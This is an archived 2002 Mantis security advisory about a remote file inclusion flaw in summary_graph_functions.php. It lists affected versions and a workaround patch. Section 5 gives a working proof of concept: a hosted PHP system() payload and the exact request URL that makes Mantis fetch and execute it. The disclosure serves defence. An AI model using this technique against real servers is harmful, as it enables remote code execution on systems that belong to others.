[Mantis Advisory/2002-04] Arbitrary code execution vulnerability in Mantis
0. Table of Contents
1. Introduction
2. Summary / Impact analysis
3. Affected versions
4. Workaround / Solution
5. Detailed explanation
6. Credit
7. Contact details
1. Introduction
Mantis is an Open Source web-based bugtracking system, written in PHP,
which uses the MySQL database server. It is being actively developed by a
small group of developers, and is considered to be in the beta stage.
2. Summary / Impact analysis
Mantis includes code which cooperates with JpGraph to generate some
statistical graphs. Some of this code is stored in an include file,
summary_graph_functions.php. This file takes care of loading the JpGraph
library, using an include() statement.
The path to the JpGraph library is stored in the configuration file.
However, summary_graph_functions.php does not load the configuration file,
but expects other scripts to have done that before including
summary_graph_functions.php.
A vulnerability opens up when summary_graph_functions.php is opened in a
browser. Any malicious user can execute arbitrary PHP code as the webserver
user by setting $g_jpgraph_path to a local path or an URL.
This vulnerability has been closed in Mantis 0.17.4.
3. Affected versions
The following versions are known to be affected:
Mantis 0.17.3
Mantis 0.17.2
Mantis 0.17.1
Mantis 0.17.0
Mantis 0.16.1
Mantis 0.16.0
Mantis 0.15.12
Mantis 0.15.11
Mantis 0.15.10
Mantis 0.15.9
Mantis 0.15.8
Mantis 0.15.7
Mantis 0.15.6
Mantis 0.15.5
Mantis 0.15.4
Mantis 0.15.3
The following versions are known to be unaffected:
Mantis 0.17.4a
Mantis 0.17.4
Any version below Mantis 0.15.3
4. Workaround / Solution
Mantis 0.17.4 adds various checks which prevent this vulnerability.
All users are recommended to upgrade to this version as soon as possible.
If an upgrade is not possible, the vulnerability can be closed by inserting
the following lines at the top of summary_graph_functions.php:
if ( isset($HTTP_GET_VARS['g_jpgraph_path']) ||
isset($HTTP_POST_VARS['g_jpgraph_path']) ||
isset($HTTP_COOKIE_VARS['g_jpgraph_path']) ) {
exit;
}
5. Detailed explanation
To exploit this vulnerability, an attacker only has to store the PHP code
(s)he wishes to execute in a textfile, make this available on a webserver
accessible by the Mantis installation and point the $g_jpgraph_path
variable to that location.
For example, we create a file with the following content:
<?php
system('ls');
exit;
?>
We make this file available on a webserver, for example at
http://server.mynetwork.net/listings.txt
If the Mantis installation does not have access to the internet, the file
should be stored on an internal server.
We then point our browser to
http://mantis.server.com/mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fserver.mynetwork.net%2Flistings.txt%3F
This will execute the following call:
include('http://server.mynetwork.net/listings.txt?jpgraph.php');
This instructs PHP to download listings.txt and parse it as a PHP script.
In this case, the browser should print a file listing of the current directory.
6. Credit
This vulnerability was reported by Joao Gouveia (tharbadat_private).
7. Contact details
The latest version of Mantis is always available from:
http://mantisbt.sourceforge.net/
The current version is 0.17.4a, which can be downloaded from
http://mantisbt.sourceforge.net/download.php3
If you have any questions about this vulnerability, or wish to report
another, you can contact the developers at:
mantisbt-securityat_private
This is a private mailinglist, readable only by a few developers.
The latest version of this and other advisories can be found at:
http://mantisbt.sourceforge.net/security.php3
This archive was generated by hypermail 2b30 : Mon Aug 19 2002 - 15:32:06 PDT